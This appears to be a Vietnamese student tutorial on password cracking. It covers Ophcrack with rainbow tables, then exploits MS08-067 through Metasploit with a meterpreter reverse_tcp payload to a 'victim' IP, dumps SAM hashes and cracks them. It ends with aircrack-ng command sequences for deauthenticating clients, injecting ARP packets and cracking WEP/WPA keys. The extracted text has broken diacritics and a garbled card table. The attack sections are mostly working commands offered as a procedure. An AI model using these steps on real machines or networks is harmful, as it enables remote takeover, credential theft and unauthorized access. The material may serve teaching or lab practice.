Nguyễn Thiện Nhân

Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện
nay.
Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần
đầu tiên muốn khơi phục mật khẩu thì Ophcrack quả là một công cụ rất
nhanh và dễ dàng sử dụng.
Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục
hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có
thể ghi ra đĩa CD rồi khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã
chạy, bạn xác định vị trí tài khoản người dùng Windows và thực hiện q
trình khơi phục mật khẩu. Tất cả các bước thực hiện hoàn toàn là tự động.
1. Cài đặt OPHCRACK
Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành
phần cài đặt cần lưu ý –Hình 1.

1


Nguyễn Thiện Nhân

Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack
Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau:
- Continue without install the table: Cài đặt chỉ có chương trình Ophcrack,
khơngcó Rainbow Table.
- Download alphanumenic table from Internet (388MB-SSTI04-10K): cài
đặt và download Rainbow Table loại SSTI04-10K.
- Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt
và download Rainbow Table loại SSTI04-5K.
- Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài
đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-10K từ CD hoặc

DVD.
- Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt
Ophcrack và sử dụng Rainbow Table loại SSTI04-5K từ CD hoặc DVD.

2


Nguyễn Thiện Nhân

Rainbow Table loại SSTI04-5K có kích thước 733MB được dùng cho các
máy tính có RAM từ 512MB trở lên. Rainbow Table loại SSTI04-10K có
kích thước 388MB được dùng cho các máy tính ít RAM hơn.
Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các
Rainbow Table theo link dưới đây, thì lựa chọn Continue without install
the table.
Code:
Rainbow Table loại SSTI04-10K (388MB)
Rainbow Table loại SSTI04-5K
(733MB) />Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2.

Hình 2: Giao diện Ophcrack trên Windows

3


Nguyễn Thiện Nhân

Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến
bảng Rainbow Table – hình 3.


Hình 3: Select ophcrack table.
Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp
OK.
2. Kết hợp metasploit với ophcrack crack password window winxp sp2.
Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có
tích hợp sẵn metasploit và ophcrack. Sau đây là các bước để thực hiện các
bước crack một password của window xp sp2.
ở đây ta sẽ lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08-067 của
Microsoft cho Windows Server Service” để khai thác thông tin. Đây là lỗ
hổng nghiêm trọng nằm trong dịch vụ Server Service RPC của hệ điều hành
Windows.Với lỗi này, Hacker hồn tồn có thể điều khiển máy tính từ xa với
quyền cao nhất của hệ thống.

4


Nguyễn Thiện Nhân

Mức độ nguy hiểm: Rất cao.
Mô tả kỹ thuật
Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows
có thể chia sẻ file, máy in,… qua mạng và là dịch vụ không thể thiếu của hệ
điều hành. Dịch vụ này hỗ trợ giao thức RPC, trong đó có một chức năng
tiếp nhận và xử lý một yêu cầu muốn chuyển đổi đường dẫn (vídụ
\\C\Program Files\..\Windows) về định dạng đường dẫn Canonicalization
(\\C\Windows). Tuy nhiên, quá trình xử lý này đã khơng kiểm sốt độ dài
của đường dẫn trong yêu cầu và xảy ra lỗi tràn bộ đệm.
Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá
khổ”, Hacker dễ dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm
quyền điều khiển, cài đặt virus, ăn cắp thông tin…


Các bước thực hiện
Bước 1: Khi chúng ta khởi động backtrack. Chúng ta mở một console và gõ
lệnh theo cú pháp sau để chạy metasploit.

5


Nguyễn Thiện Nhân

Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3.
Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử
dụng lỗi bảo mật này.

Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để
chuẩn bị cho cuộc tấn cơng chiếm quyền điều khiển.
Cú pháp :
set payload windows/meterpreter/reverse_tcp //Meta-Interpreter là một
advanced payload. Muc đích của nó là để cung cấp những tập lệnh để khai
thác, tấn công các máy remote computers.Nó được viết từ các developers
dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng
được thực thi trong bộ nhớ, hồn tồn khơng được ghi lên đĩa nên có thể

6


Nguyễn Thiện Nhân

tránh được sự phát hiện từ các phần mềm chống virus
Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các

remote computers.
set RHOST 192.168.1.1 // đây là địa chỉ ip của máy victim.
set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn cơng.

Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như
hình trên.
Bước4: ở bước này ta sẽ tiến hành khai thác lỗi.

7


Nguyễn Thiện Nhân

Bước5 : Khi đã vào được máy victim. Ta dung lệnhh ashdump để hash files
an trong window xp.

Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win. Ta sẽ copy
đoạn hash dump đó vào trong file text. Và lưu lại.

8


Nguyễn Thiện Nhân

Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật
khẩu. Ta sẽ load file hash đã được tạo từ bước 6 vàovà nhấn nút crack. Và
đợi chờ kết quả của chương trình trả về.
Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow
table. Chúng ta có thể download các tables đó ở đây.
Link download : />Dưới đây là các hình ảnh dung phần mềm ophcrack để crack file hash.


9


Nguyễn Thiện Nhân

Hình1 : load file hash đã copy được

Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash

10


Nguyễn Thiện Nhân

Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở
cột NT Pwd.

I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA
•

WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành
phần trong mạng không sử dụng các loại cáp như một mạng thông
thường, môi trường truyền thơng của các thành phần trong mạng là
khơng khí. Các thành phần trong mạng sử dụng sóng điện từ để truyền

11


Nguyễn Thiện Nhân


thông với nhau.Institute of Electrical and Electronics Engineers(IEEE)
đã phê chuẩn sự ra đời của chuẩn 802.11, với tên gọi WIFI (Wireless
Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị không
dây dựa trên chuẩn 802.11a/b/g bao gồm các Access Point và các
thiết bị đầu cuối không dây như pc card, usb card, wifi PDA… kết nối
với nhau. Wifi hiện nay có 3 kiểu mã hố chính gồm: WEP-Wired
Equivalent Privacy , WPA-Wireless Protected Access và WPA2.

•

WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa,
giải mã dữ liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một
phần của chuẩn 802.11 gốc dựa trên thuật tốn mã hóa RC4, mã hóa
dữ liệu 40bit để ngăn chặn sự truy cập trái phép từ bên ngồi.

•

WPA (Wi-fi Protected Access) được thiết kế nhằm thay thế cho WEP
vì có tính bảo mật cao hơn. Temporal Key Intergrity Protocol (**IP),
còn được gọi là WPA key hashing là một sự cải tiến dựa trên WEP, là
vì nó tự động thay đổi khóa, điều này gây khó khăn rất nhiều cho các
Attacker dị thấy khóa của mạng.Mặt khác WPA cũng cải tiến cả
phương thức chứng thực và mã hóa. WPA bảo mật mạnh hơn WEP rất
nhiều.

II.Aircrack-ng:
II.1-Giới thiệu Aircrack-ng:
Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ
ngay đến chương trình Aircrack. Aircrack là chương trình crack password


12


Nguyễn Thiện Nhân

wireless rất mạnh, một cơng cụ bẻ khóa WEP/WPA nhanh nhất,chạy được
trên Windows và Linux.
Aircrack hỗ trợ các chuẩn khơng giây 802.11a/b/g dùng để Crack WEP và
WPA-PSK. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ
40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless.
Cơng cụ này cịn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức
Brute Force Attack. Ngoài ra với airdecap chúng có khả năng giải mã các
file được mã hóa bởi WEP và WPA.

II.2 Aircrack-ng hỗ trợ việc lựa chọn card wireless thích hợp:

Tên Card

Loại

Chipset Antenna

Windows

Linux

hỗ trợ
hỗ


13


Nguyễn Thiện Nhân

trợ
Airlink
AWLC4030
Belkin F5D7010ed
Belkin F5D8071

D-Link DWA-643

D-Link DWL-650
D-Link DWL-

airodump-

CardBus

Atheros

Nội bộ

CardBus

Atheros

Nội bộ


Có

Atheros

Nội bộ

Có

ExpressCar
d
ExpressCar
d
PCMCIA

ng

Có

Chưa xác
Atheros
Prism
2,5

Nội bộ

Nội bộ

nhận
airodumpng
airodump-


Có

Có

CardBus

Atheros

Nội bộ

Ralink

Atheros

Nội bộ

CardBus

Atheros

Nội bộ

CardBus

Atheros

Nội bộ

có


Có

MSI CB54G2

CardBus

Ralink

Nội bộ

Khơng

Có

Netgear WAG511

CardBus

Atheros

Nội bộ

G630 C2 v3.01
D-Link DWLG630 E1

ng
Airodumpng

Có


Có

D-Link DWLG650
C3 , C4 , B5 C3,

Airodumpng

Có

C4, B5
Linksys
WPC55AG
v1.2 v1.2

14

Airodumpng

có


Nguyễn Thiện Nhân

Netgear WG511T

CardBus

Atheros


Nội bộ

Netgear WG511U

CardBus

Atheros

Nội bộ

Proxim 8470-WD

CardBus

Atheros MMCX

Senao NL-2511
CD PLUS EXT

PCMCIA

CD PLUS EXT
SMC SMCWCBTG
TP-Link TLWN610G
TRENDnet TEW441PC
Ubiquiti SRC

Prism
2,5


MMCX

CardBus

Atheros

Nội bộ

CardBus

Atheros

CardBus

Atheros

CardBus

Atheros MMCX

Nội bộ

Airodumpng
Airodumpng

có

khơng

có


Airodumpng
Airodump-

Airodumpng
Airodumpng

Khuyến cáo ta nên dùng card Atheros chipset.

II.2-Một số điều cần biết khi Crack Password:
1. Card mạng của bạn không chuyển về chế độ monitor được – hãy xem
danh sách card được hỗ trợ trên trang trên.

15

có

khơng

ng
Nội bộ

có

có

có

có


có


Nguyễn Thiện Nhân

2. Chỉ có thể dị được khóa WPA/WPA2-PSK3. Change mac address có thể
sẽ gặp lỗi khơng authentication được.
4. Sự im lặng của router: nếu trong mạng của AP khơng có máy con kết nối
thì ta sẽ nhanh chóng nhận ra là mình khơng hề bắt được một gói tin ARP
nào hết. Lý do là các AP đời sau này đã được harderning, chúng rất yên lặng,
khó mà cạy ra được một gói tin ARP nào. Giải pháp:là hãy thử crack nó vào
một thời gian khác hoặc dùng mdk3 để cố gắng reset AP, khi AP khởi động
lại, nó sẽ quăng ra một ít gói tin ARP, dùng koreK hoặc fragment để crack
chúng thôi
5.Khi bạn dùng Aireplay mà thấy gói tin gởi đi nhưng khơng có trả lời
(ACK) thì mình phải chuyển sang STATION khác và áp dụng tương tự.
6.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà
đứng n thì thua rồi.
7. Khi khơng thể chứng thực với AP thì có nhiều ngun nhân, sai kênh, sai
MAC AP(BSSID), q xa, khơng có Client nào đang kết nối với AP.

II.3- Tiến Trình Chi Tiết Để Crack Password.
1. Xem interface của card mạng
_iwcofig hoặc __ifcofig để xem có những card mạng nào trong máy, thường
là eth0 và wlan0(chúng ta sẽ dùng wlan0)
2. Chuyển wlan0 về chế độ nghe ngóng
_airmon-ng wlan0 start. Lệnh này sẽ tạo ra một card wireless ảo là mon0
3. Scan mạng wireless trong vùng bắt sóng.

16



Nguyễn Thiện Nhân

_airodump-ng wlan0(mon0) để bắt sóng wifi.
4. Tiến hành bắt gói tin
_airodump-ng --channel [AP channel]--bssid [MAC AP ] --write capturefile
wlan0
bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra
một tên file .
5. Tiến hành bắt tay với AP để tạo ra dịng tín hiệu.
_ aireplay-ng -1 0 -a <MAC AP> -c <MAC Client đang kết nối> wlan0
Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi
gói tin chứa 4-way handshake đến AP, trong gói tin đó chứa password(đã
được hash) của mạng. Để được password ta phải có gói tin trên.
Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực
Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và
client sẽ phải gửi gói tin chứa 4-way handshake để yêu cầu kết nối lại. Khi
đó máy của hacker ta sẽ bắt được gói tin
6.Tạo cơ sở dữ liệu
Dùng lệnh theo thứ tự:
_airolib-ng crackwpa import essid essid.txt
để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file
essid.txt mình đã tạo sẵn.
-airolib-ng crackwpa import passwd /đường dẫn tới file password.lst
-airolib-ng crackwpa --batch: Kết hợp essid với password
-airolib-ng crackwpa stats: kiểm tra tính hợp lệ

17



Nguyễn Thiện Nhân

Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong
Backtrack, vì thực chất việc dị
password là so sánh gói tin với list pass có sẵn trong máy
7.Crack capture file, tìm khố password wep,wpa.
_aircrack-ng -b [AP BSSID] [capture file(s) name]
_aircrack-ng -r crackwpa wpa*.cap
Aircrack sẽ bắt đầu lục lọi trong số những gói dữ liệu đã bắt được để tìm ra
khóa WEP.

III.Crack Password Wireless WEP Bằng Aircrack

1.Chuẩn bị :
1.1.Phần cứng :

18


Nguyễn Thiện Nhân

_ 1 AP có hỗ trợ bảo mật WEP
_ 1 PC có wireless card kết nối với AP-> Client
_ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ
injection(chèn gói tin)-> Attacker
1.2.Phần mềm :
PC của Attacker :
_ HĐH Linux (mình sẽ dùng BackTrack 4)
_ HĐH Windows

_ Aircrack-ng
2. Crack Password Wireless WEP Bằng Aircrack
2.1.Các bước cơ bản :
_ Bước 1 : chuyển wireless card về chế độ monitor
_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target
_ Bước 3 : bơm gói ARP để tăng lưu lượng dữ liệu bắt được
_ Bước 4 : sau khi bắt đủ gói dữ liệu , dùng aircrack-ng dò password

2.2.Thực hiện crack WEP:
Bước 1 :
Xem các interface của card mạng :

Trường hợp này wireless card có interface là wlan0

19


Nguyễn Thiện Nhân

Chuyển wlan0 về chế độ Monitor

airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0

Bước 2 :
Scan mạng wireless trong “vùng bắt sóng” của wireless card

Trong “vùng bắt sóng” của wireless card có 2 AP có WEP , 1 AP là SSID là
Diep , 1 AP là quang1 (AP này có Power là -1 tức là mạng ad-hoc)
(ngồi ra cịn có 1 AP mà cột ESSID ghi là <length: 7> tức là AP ẩn , Hidden
SSID)


20


Nguyễn Thiện Nhân

AP mà ta quan tâm là Diep có BSSID (MAC Address)
00:14:6C:06:D7:96 , ESSID (tên định danh của mạng) Diep , Channel là
11, và đang có 2 client kết nối .
(tắt process airodump-ng mon0 đi)

Em xin giải thích một số thơng số chính:
• BSSID: địa chỉ Mac của AP cần hack, có bao nhiêu AP sẽ được liệt kê hết
ở đây.
• PWR: là power ,chỉ độ mạnh yếu của mạng, power = -1 đó là mạng adhoc.
• Beacons: là các mốc kết nối
• #Data: số data luân chuyển trong mạng. Dữ liệu càng cao càng tốt.
• #/s : là số lượng packet chuyển trong mạng trong 1 s.Tốc độ kết nối càng
cao càng tốt.

21


Nguyễn Thiện Nhân

• CH là channel (Kênh kết nối), một thơng số quan trọng trong việc crack
khóa.
• Thơng số MB là chuẩn của AP: 11 MB là chuẩn b, 54 MB là chuẩn g.
• ESSID là tên của mạng(AP), nếu AP đang ẩn tên thì nó sẽ có dạng
<length:x>.

• ENC : Bảo mật theo giao thức nào đó WEP, WPA, WPA2,...
• CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,...
• AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,...
• STATION: MAC của Client đang kết nối tới AP.

Ta sẽ bắt dữ liệu từ AP Diep

-c 11 : channel của AP
-w wep : dữ liệu bắt được sẽ lưu vào file wep.cap (4 file wep* sẽ được tạo ra
, xem hình bên dưới)
-d 00:14:6C:06:D7:96 : BSSID của AP
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ bắt các gói dữ liệu đi qua AP có MAC là
00:14:6C:06:D7:96 trên kênh 11 và ghi vào file wep.cap

22


Nguyễn Thiện Nhân

Những Client có PoWeR -1 là những client “bất hoạt” hoặc “ngồi vùng bắt
sóng” của wireless card , ta chỉ cần quan tâm đến client có BSSID là
00:13:E8:BE:E9:C5.

Bước 3 :
Theo lý thuyết , muốn dò ra password của AP thì phải cần ít nhất khoảng
200.000 gói dữ liệu (tức là cột #data phải đạt đến con số 200.000) , nhưng
trên thực tế thì khi data đạt đến 20.000-50.000 là có thể dị ra password.
Nếu cứ để lệnh airodump-ng bắt dữ liệu khơng thơi thì có khi đợi cả ngày
vẫn chưa có 20.000 gói dữ liệu , do đó ta phải bắt và “bơm” các gói ARP để

tăng lưu lượng dữ liệu qua lại

aireplay-ng -3 : standard ARP-request replay
-x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 500)

23


Nguyễn Thiện Nhân

-b 00:14:6C:06:D7:96 : MAC address, Access Point
-h 00:13:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả client 00:13:E8:BE:E9:C5 để “bơm”
ARP vào AP 00:14:6C:06:D7:96, mỗi giây 1000 gói.

Các gói ARP được tạo ra khi client có yêu cầu kết nối với AP , vì vậy ta phải
“đá” client ra :

aireplay-ng -0 1 : deauthenticate 1 lần
-a 00:14:6C:06:D7:96 : set Access Point MAC address
-c 00:13:E8:BE:E9:C5: set Destination MAC address
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:14:6C:06:D7:96 và gởi
đến client 00:13:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” ,
client sẽ phải gởi gói ARP yêu cầu kết nối lại với AP. Lúc này lệnh aireplayng -3 ở trên sẽ bắt được gói ARP và “bơm” nó vào AP
Quay lại cửa sổ của lệnh airodump-ng và aireplay-ng ta sẽ thấy cột #Data
tăng lên rất nhanh

24



Nguyễn Thiện Nhân

Bước 4 :
Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dị password từ file
.cap (được tạo ra ở bước 2) bằng lệnh aircrack-ng

25